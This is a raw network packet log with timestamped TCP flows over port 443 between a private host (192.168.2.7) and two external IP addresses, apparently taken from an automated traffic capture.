                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.279715061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.279741049 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.279761076 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.279798985 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.279798985 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.280641079 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.280684948 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.280709982 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.280716896 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.280735970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.280759096 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.281323910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.281389952 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.281419992 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.281444073 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.281492949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.281492949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282017946 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282077074 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282100916 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282108068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282145023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282145023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282183886 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282232046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282285929 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282285929 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282294035 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282346010 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282717943 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282757998 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282789946 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282797098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282829046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.282829046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.283047915 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.286010027 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.286056042 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.286132097 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.286132097 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.286145926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.286456108 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.369870901 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.369951010 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.370023012 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.370054960 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.370085001 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.370142937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.370388985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.370439053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.370460033 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.370488882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.370500088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.370558023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.371135950 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.371180058 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.371223927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.371236086 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.371249914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.371285915 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.371694088 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.371741056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.371772051 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.371779919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.371803045 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.371814966 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.372354031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.372401953 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.372462988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.372462988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.372469902 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.372534037 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.372636080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.372680902 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.372711897 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.372718096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.372750044 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.372750044 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.373163939 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.373205900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.373249054 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.373255014 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.373275042 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.373286009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.376662970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.376723051 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.376765966 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.376773119 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.376805067 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.376805067 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.448054075 CEST49714443192.168.2.713.85.23.86
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.460592031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.460712910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.460752010 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.460787058 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.460835934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.460835934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.461050034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.461097956 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.461127996 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.461134911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.461164951 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.461222887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.461705923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.461774111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.461807966 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.461817026 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.461859941 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.461882114 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.462261915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.462305069 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.462338924 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.462346077 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.462382078 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.462382078 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.462553024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.462599993 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.462637901 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.462645054 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.462671995 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.462671995 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.463340044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.463416100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.463422060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.463447094 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.463484049 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.463500977 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.463845015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.463886976 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.463913918 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.463922977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.463956118 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.463965893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.467238903 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.467294931 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.467344046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.467355013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.467370987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.467402935 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.495409012 CEST4434971413.85.23.86192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.551048994 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.551099062 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.551176071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.551176071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.551197052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.551254988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.551564932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.551629066 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.551676989 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.551690102 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.551701069 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.551733017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.552267075 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.552309990 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.552416086 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.552428007 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.552490950 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.552867889 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.552911997 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.552953959 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.552964926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.552993059 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.552993059 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.553342104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.553383112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.553411961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.553421974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.553462029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.553462029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.554014921 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.554058075 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.554097891 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.554107904 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.554174900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.554425955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.554476023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.554498911 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.554507017 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.554542065 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.554542065 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.557933092 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.557976007 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.558005095 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.558020115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.558056116 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.558056116 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.641836882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.641901016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.641971111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.641997099 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.642021894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.642043114 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.642064095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.642107010 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.642155886 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.642163038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.642191887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.642191887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643002033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643043995 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643085957 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643100023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643114090 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643218040 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643546104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643589020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643625975 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643634081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643657923 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643728018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643841028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643882990 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643906116 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643913984 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643959999 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.643959999 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.644470930 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.644517899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.644573927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.644573927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.644582987 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.644814968 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.644906044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.644964933 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.644985914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.644994020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.645034075 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.645034075 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.649561882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.649626970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.649660110 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.649676085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.649722099 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.649722099 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.678817034 CEST4434971413.85.23.86192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.678843975 CEST4434971413.85.23.86192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.678852081 CEST4434971413.85.23.86192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.678862095 CEST4434971413.85.23.86192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.678925991 CEST4434971413.85.23.86192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.678976059 CEST49714443192.168.2.713.85.23.86
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.679008007 CEST4434971413.85.23.86192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.679020882 CEST49714443192.168.2.713.85.23.86
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.679025888 CEST4434971413.85.23.86192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.679080009 CEST49714443192.168.2.713.85.23.86
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.679332972 CEST4434971413.85.23.86192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.679394960 CEST4434971413.85.23.86192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.679717064 CEST49714443192.168.2.713.85.23.86
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.745356083 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.745425940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.745502949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.745502949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.745527983 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.745621920 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.745734930 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.745779991 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.745804071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.745811939 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.745848894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.745848894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.747210979 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.747256041 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.747303009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.747315884 CEST44349713167.114.14.168192.168.2.7
